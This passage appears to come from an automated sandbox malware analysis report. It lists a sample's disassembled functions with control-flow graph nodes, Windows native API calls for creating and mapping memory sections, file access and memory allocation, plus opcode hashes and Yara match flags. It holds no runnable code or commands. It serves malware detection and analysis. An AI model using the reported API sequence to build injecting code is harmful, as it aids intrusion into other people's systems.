                                  • Instruction Fuzzy Hash: DFF17170918A8D8FDBA5EF68C884AEEB7F0FF98305F40462AD44AD7250DF34A641DB41
                                  Function 04539BAF Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 227nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 209 4539baf-4539bef 210 4539bf7-4539bfe 209->210 211 4539bf2 call 4539102 209->211 212 4539c00 210->212 213 4539c0c-4539c9a call 453b942 * 2 NtCreateSection 210->213 211->210 215 4539c02-4539c0a 212->215 219 4539ca0-4539d0a call 453b942 NtMapViewOfSection 213->219 220 4539d5a-4539d68 213->220 215->213 215->215 223 4539d52 219->223 224 4539d0c-4539d4c 219->224 223->220 226 4539d69-4539d6b 224->226 227 4539d4e-4539d4f 224->227 228 4539d88-4539ddc call 453cd62 NtClose 226->228 229 4539d6d-4539d72 226->229 227->223 230 4539d74-4539d86 call 4539172 229->230 230->228
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: Section$CloseCreateView
                                  • String ID: @$@
                                  • API String ID: 1133238012-149943524
                                  • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction ID: bb180ab8c7bcef046c335b767bc74e31466610ab94c5d66aec7157f6c5fdd8de
                                  • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction Fuzzy Hash: 7061C4B051CB098FCB58DF58D8856AABBE0FF98315F50062EE58AC3251DF75E441CB86
                                  Function 04539BB2 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 171nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 268 4539bb2-4539bfe call 4539102 271 4539c00 268->271 272 4539c0c-4539c9a call 453b942 * 2 NtCreateSection 268->272 274 4539c02-4539c0a 271->274 278 4539ca0-4539d0a call 453b942 NtMapViewOfSection 272->278 279 4539d5a-4539d68 272->279 274->272 274->274 282 4539d52 278->282 283 4539d0c-4539d4c 278->283 282->279 285 4539d69-4539d6b 283->285 286 4539d4e-4539d4f 283->286 287 4539d88-4539ddc call 453cd62 NtClose 285->287 288 4539d6d-4539d72 285->288 286->282 289 4539d74-4539d86 call 4539172 288->289 289->287
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: Section$CreateView
                                  • String ID: @$@
                                  • API String ID: 1585966358-149943524
                                  • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction ID: f25bfa47fd492f1458c7af6bf5827aff222bfe47c28235dd2c363382aa0fc482
                                  • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction Fuzzy Hash: 1B519EB0618B098FD758DF18D8856AABBE0FF88314F50062EE98EC3651DF75E441CB86
                                  Function 0453A042 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163nativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 0453A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction ID: 050eccbec240225dc5bb06ab55500d7be1a88ee8cd84384ce11398a1304efdbe
                                  • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction Fuzzy Hash: E9514E70914A8C8FDBA9EF68C8946EEB7F4FB98305F40462ED44AD7211DF30A645DB41
                                  Function 0254A35A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 44filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 548 254a35a-254a3b1 call 254af60 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02544BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02544BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0254A3AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 7c417f45352538f3dbc70b9006c8c35baf7fa9f0c61c4a99e0ec42fa983afd1d
                                  • Instruction ID: 01cb8869ac7ae82d9c2c5b19910e646c3b38dd356edc8a3d88c376d7717d69f9
                                  • Opcode Fuzzy Hash: 7c417f45352538f3dbc70b9006c8c35baf7fa9f0c61c4a99e0ec42fa983afd1d
                                  • Instruction Fuzzy Hash: 3501E4B2241108BFCB48CF88CC90DEB77E9AF8C754F158608FA0DD7240D630E8418BA0
                                  Function 0254A360 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 551 254a360-254a376 552 254a37c-254a3b1 NtCreateFile 551->552 553 254a377 call 254af60 551->553 553->552
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02544BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02544BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0254A3AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 095cb4913ddacf0cf376a742b2e7916ff30b365a1037b378b769378b5336e6ca
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 36F0B2B2200208ABCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                  Function 0254A410 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(02544D72,5EB65239,FFFFFFFF,02544A31,?,?,02544D72,?,02544A31,FFFFFFFF,5EB65239,02544D72,?,00000000), ref: 0254A455
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: f01be71a311c8b5cd4951c4107c382e30abe96617a22fe1c69b32251c4ec43bb
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: E6F0A4B6200208ABDB14DF89DC90EEB77ADEF8C754F158248BE1D97241DA30E8118BA4
                                  Function 0254A40A Relevance: 1.5, APIs: 1, Instructions: 33filenativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtReadFile.NTDLL(02544D72,5EB65239,FFFFFFFF,02544A31,?,?,02544D72,?,02544A31,FFFFFFFF,5EB65239,02544D72,?,00000000), ref: 0254A455
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 502a9b782b303b8a28e01c6a188142a589d386d33725d39a54a7567b0150e13c
                                  • Instruction ID: 5f2234411f3ab0d0b1145621081cf66514be79ba69607840baff55eb7b34e337
                                  • Opcode Fuzzy Hash: 502a9b782b303b8a28e01c6a188142a589d386d33725d39a54a7567b0150e13c
                                  • Instruction Fuzzy Hash: 49F017B6200149ABCB04DFA8D990CEBB7ADFF8C318B15864DFD5D97201C634E8558BA4
                                  Function 0254A540 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02532D11,00002000,00003000,00000004), ref: 0254A579
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 1875fa96e08602fb96cf770301cd2ea3634e8e92a312105506a5396a77f74ee7
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 95F015B6200208ABDB14DF89CC80EAB77ADEF88754F118248BE0897241C630F811CBA4
                                  Function 0254A490 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • NtClose.NTDLL(02544D50,?,?,02544D50,00000000,FFFFFFFF), ref: 0254A4B5
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 7e80abd9c8a63d7d52b4e76702afe2c5e0f80d68bf8927681d3961e9cf88c6c8
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: B0D012762402147BD710EB98CC45E97775DEF84754F154555BA185B241C530F50086E0
                                  Function 047C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 969396c496c778867035519a4077cfc28704438fba3e110b9787af8c732c86fa
                                  • Instruction ID: 2371165cc3979c44bbd88dd0239d1ad66b942af6c53810d864bbc0c3834b7967
                                  • Opcode Fuzzy Hash: 969396c496c778867035519a4077cfc28704438fba3e110b9787af8c732c86fa
                                  • Instruction Fuzzy Hash: E190023561551402F1107158451470610258BD0205F66C421A0525578D8795DA5165A3
                                  Function 047C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                  • Instruction ID: 04ad1aca25ecfbc333dc90cc8bf8d080045fced0e6f1c983c576dbeb9ed0ce0f
                                  • Opcode Fuzzy Hash: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                  • Instruction Fuzzy Hash: 6890023521149802F1207158840474A00258BD0305F5AC421A4525678D8695D9917122
                                  Function 047C2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                  • Instruction ID: 739ca9f4f9ebb5346da7671796f3f29602c611bf04f269e54c77bb904c6fc183
                                  • Opcode Fuzzy Hash: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                  • Instruction Fuzzy Hash: CB90023521141842F11071584404B4600258BE0305F56C026A0225674D8615D9517522
                                  Function 047C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                  • Instruction ID: b0c8b1b9d89b6681c10f110819601343b1106fede93b04ed7c28cdda64a4bcce
                                  • Opcode Fuzzy Hash: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                  • Instruction Fuzzy Hash: BE90023521141402F1107598540864600258BE0305F56D021A5125575EC665D9916132
                                  Function 047C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                  • Instruction ID: 42ef9a698eb7bff1014cc742f08ffdb6eb445a98398d5e9ff0301a2c5b5f7cec
                                  • Opcode Fuzzy Hash: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                  • Instruction Fuzzy Hash: C390022D22341002F1907158540860A00258BD1206F96D425A0116578CC915D9695322
                                  Function 047C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                  • Instruction ID: e201b741e320f292ac2f6b2efbab26c6fb2227883a1e8350442b7a4ed63a2ea9
                                  • Opcode Fuzzy Hash: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                  • Instruction Fuzzy Hash: 2F90023521141413F1217158450470700298BD0245F96C422A0525578D9656DA52A122
                                  Function 047C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                  • Instruction ID: 3477de52ddc57e6b6dab2908beb0797d1ed5075dc1ab0a5bb1554246d4e75f75
                                  • Opcode Fuzzy Hash: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                  • Instruction Fuzzy Hash: 84900225252451527555B158440450740269BE0245796C022A1515970C8526E956D622
                                  Function 047C2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e821362dbfb07bab67d42aff68969c45d797a2685f08004eed5778122aaa98f7
                                  • Instruction ID: e70a42116ab1ddd054437f320af2f7824c864769a4a569e98a966303604cb90c
                                  • Opcode Fuzzy Hash: e821362dbfb07bab67d42aff68969c45d797a2685f08004eed5778122aaa98f7
                                  • Instruction Fuzzy Hash: CA90027521141402F1507158440474600258BD0305F56C021A5165574E8659DED56666
                                  Function 047C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                  • Instruction ID: e292c81da1eb5ee52cba6a34bb993ac62bd4cc7662301e7d73ec92faa2507545
                                  • Opcode Fuzzy Hash: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                  • Instruction Fuzzy Hash: 1790026535141442F11071584414B060025CBE1305F56C025E1165574D8619DD526127
                                  Function 047C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                  • Instruction ID: adb9fc78d02a4198befd458c8ef96766612af3f7ff995f3c3e7e5ce3cd9ab59f
                                  • Opcode Fuzzy Hash: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                  • Instruction Fuzzy Hash: 6F900225221C1042F21075684C14B0700258BD0307F56C125A0255574CC915D9615522
                                  Function 047C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5e37dda580b7cef9cb5ba1ccf01ef3cc233271f4c540b12e03715dee93e73024
                                  • Instruction ID: 35f0f51c100f1a6977ee16f44f882d6c51214116b743856cd0100c985f4b1c1d
                                  • Opcode Fuzzy Hash: 5e37dda580b7cef9cb5ba1ccf01ef3cc233271f4c540b12e03715dee93e73024
                                  • Instruction Fuzzy Hash: 9F900229221410032115B558070450700668BD5355356C031F1116570CD621D9615122
                                  Function 047C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: aa5530af661971b6ad2175a03a6242748adf75f9cefc38bdb38dc0abec1a872f
                                  • Instruction ID: fa298541c8e28e08e871563fbad70da0b1160b163f16b290bfe19e03d8de644b
                                  • Opcode Fuzzy Hash: aa5530af661971b6ad2175a03a6242748adf75f9cefc38bdb38dc0abec1a872f
                                  • Instruction Fuzzy Hash: 1990026521241003611571584414616402A8BE0205B56C031E11155B0DC525D9916126
                                  Function 047C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9411904eb00e92b8886db3178861991f3314c766695fadfa1b899e77c97651d
                                  • Instruction ID: f4f72bc8c25152d985a40ebb9a3d6eccc1a9112476bf9592b0129258e1d2ea45
                                  • Opcode Fuzzy Hash: c9411904eb00e92b8886db3178861991f3314c766695fadfa1b899e77c97651d
                                  • Instruction Fuzzy Hash: 4690023521141802F1907158440464A00258BD1305F96C025A0126674DCA15DB5977A2
                                  Function 047C2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ea37c2b6c3f43bc0217b0312ff0850053546a505ade57199895ddb4cf9e72ea6
                                  • Instruction ID: 26c6790c1dfebd15df2ac7dc1145904f53d6d71bb41f8103d6cae427028b0ddb
                                  • Opcode Fuzzy Hash: ea37c2b6c3f43bc0217b0312ff0850053546a505ade57199895ddb4cf9e72ea6
                                  • Instruction Fuzzy Hash: 4290023521545842F15071584404A4600358BD0309F56C021A01656B4D9625DE55B662
                                  Function 02549080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
